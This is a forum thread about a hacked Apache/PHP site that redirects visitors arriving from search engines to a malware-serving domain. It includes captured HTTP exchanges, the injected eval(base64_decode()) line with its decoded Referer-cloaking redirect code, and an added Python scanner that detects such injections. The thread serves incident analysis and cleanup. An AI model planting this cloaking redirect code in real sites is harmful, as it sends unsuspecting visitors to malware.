Apache server redirecting requests that come from Google: compromised?

I found something very suspicious. When you connect to www.pulseexpress.com after following a Google link, the server redirects you to a very dodgy site that immediately sends you a .exe file:

    # host www.pulseexpress.com
    www.pulseexpress.com has address 173.236.189.124
    # netcat 173.236.189.124 80
    GET / HTTP/1.1
    Host: www.pulseexpress.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Iceweasel/10.0.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDEQFjAA&url=http%3A%2F%2Fwww.pulseexpress.com%2F&ei=JfhkT_SuGYf40gG85MW_CA&usg=AFQjCNGlomNN7JWxEG7DUzbJyqnVFYkj7w&sig2=i5xsJPgIs1sbD6gpDzJ7OQ

    HTTP/1.1 302 Moved Temporarily
    Date: Sat, 17 Mar 2012 20:53:40 GMT
    Server: Apache
    Location: http://www.fdvrerefrr.ezua.com/
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 20
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html

However, if you type the address directly into the browser, the content is served normally:

    # netcat 173.236.189.124 80
    GET / HTTP/1.1
    Host: www.pulseexpress.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Iceweasel/10.0.2
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en-gb;q=0.8,en;q=0.6,de-de;q=0.4,de;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Sat, 17 Mar 2012 20:53:51 GMT
    Server: Apache
    P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
    Expires: Mon, 1 Jan 2001 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: e7c55e1c7796b5e5c04e0c55afd862ea=e427sf2eh4t11jno5c4pvaal40; path=/
    Set-Cookie: virtuemart=e427sf2eh4t11jno5c4pvaal40
    Set-Cookie: ja_purity_tpl=ja_purity; expires=Thu, 07-Mar-2013 20:53:53 GMT; path=/
    Last-Modified: Sat, 17 Mar 2012 20:53:53 GMT
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 4428
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    [...]

My guess is that this system has been compromised. Also, this attack does not look trivial, because the Apache configuration has to be modified so that only some requests are redirected, which probably makes it less likely that the owner notices the problem.

Do people agree with this analysis?

Is this conditional-redirect technique a new hand-crafted one, or is it a routine included in standard attack software kits?

Yes, the site has been compromised, and while this is a clever hack it is not uncommon; we have seen it widely over the past few months. Look for .htaccess files modified in the past few days/weeks; they will be full of crazy mod_rewrite rules. Secure the site, delete/edit the damaged files (I would say "restore from backup", but I have given up even trying to discuss a decent backup regime with people who habitually run vulnerable software and keep their site's FTP password on their vulnerable desktop), and the site will be fine again.

I just ran into this. The redirect code was encoded at the top of every PHP file on the site...

 <?php eval(base64_decode("DQplcnJvcl=")); 

...which decodes to...

    error_reporting(0);                      // silence PHP errors so nothing reaches the logs
    $nccv = headers_sent();
    if (!$nccv) {                            // only act while a Location header can still be sent
        $referer = $_SERVER['HTTP_REFERER'];
        $ua = $_SERVER['HTTP_USER_AGENT'];   // read but never used in this variant
        // only visitors arriving from a search engine are redirected
        if (stristr($referer, "yahoo") or stristr($referer, "google") or stristr($referer, "bing")
            or stristr($referer, "yandex.ru") or stristr($referer, "rambler.ru") or stristr($referer, "mail.ru")
            or stristr($referer, "ask.com") or stristr($referer, "msn") or stristr($referer, "live")) {
            // skip referers that look like a cached copy or an operator search
            if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                header("Location: http://www.fdvrerefrr.ezua.com/");
                exit();
            }
        }
    }

You can find an explanation here... http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/
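An added defender-side scanner (example code written for this thread, not from either answer above) that looks for the two indicators the answers describe: PHP files opening with `eval(base64_decode("..."))` whose decoded payload branches on `HTTP_REFERER` towards a `Location:` header, and recently modified `.htaccess` files with a Referer-conditional `RewriteRule` to an external URL. The payload is decoded but never executed; the sample PHP, sample `.htaccess` text and the `REDIRECT-TARGET.invalid` domain are constructed placeholders.

```python
import base64
import os
import re
import time

EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']')
ENGINES = ("google", "yahoo", "bing", "yandex", "rambler", "mail.ru", "ask.com", "msn", "live")
HTACCESS_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}', re.I | re.M)
HTACCESS_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+https?://', re.I | re.M)

def decode_payload(blob):
    """Base64-decode the eval() argument WITHOUT executing it; tolerate stripped '=' padding."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob).decode("latin-1")
    except ValueError:  # binascii.Error (malformed base64) is a ValueError
        return ""

def analyze_php(source):
    """One finding per eval(base64_decode()) call; flags payloads that cloak on the Referer."""
    findings = []
    for m in EVAL_B64.finditer(source):
        decoded = decode_payload(m.group(1)).lower()
        engines = [e for e in ENGINES if e in decoded]
        cloaking = "http_referer" in decoded and "location:" in decoded and bool(engines)
        findings.append({"referer_cloaking": cloaking, "engines": engines, "preview": decoded[:60]})
    return findings

def analyze_htaccess(text):
    """True when the file both tests HTTP_REFERER and rewrites to an absolute external URL."""
    return bool(HTACCESS_COND.search(text) and HTACCESS_RULE.search(text))

def scan_tree(root, max_age_days=14):
    """Walk a web root; return (path, reason) for cloaking PHP files and recent suspicious .htaccess."""
    cutoff = time.time() - max_age_days * 86400
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1", errors="replace") as fh:
                text = fh.read()
            if name.endswith(".php") and any(f["referer_cloaking"] for f in analyze_php(text)):
                hits.append((path, "Referer-conditional redirect hidden in eval(base64_decode())"))
            elif name == ".htaccess" and analyze_htaccess(text) and os.path.getmtime(path) > cutoff:
                hits.append((path, "recently modified .htaccess with Referer-based external RewriteRule"))
    return hits
# Constructed sample input: the decoded payload quoted above, re-encoded the way it was injected.
SAMPLE_PAYLOAD = 'error_reporting(0); $referer=$_SERVER["HTTP_REFERER"]; if (stristr($referer,"google")) { header("Location: http://REDIRECT-TARGET.invalid/"); exit(); }'
SAMPLE_PHP = '<?php eval(base64_decode("%s")); ?>\n<html>' % base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_HTACCESS = "RewriteEngine On\nRewriteCond %{HTTP_REFERER} (google|bing) [NC]\nRewriteRule .* http://REDIRECT-TARGET.invalid/ [R=302,L]\n"
```

Run `scan_tree("/path/to/webroot")` on a copy of the site; a clean site yields an empty list, and each hit names the file to inspect before restoring it from a known-good copy.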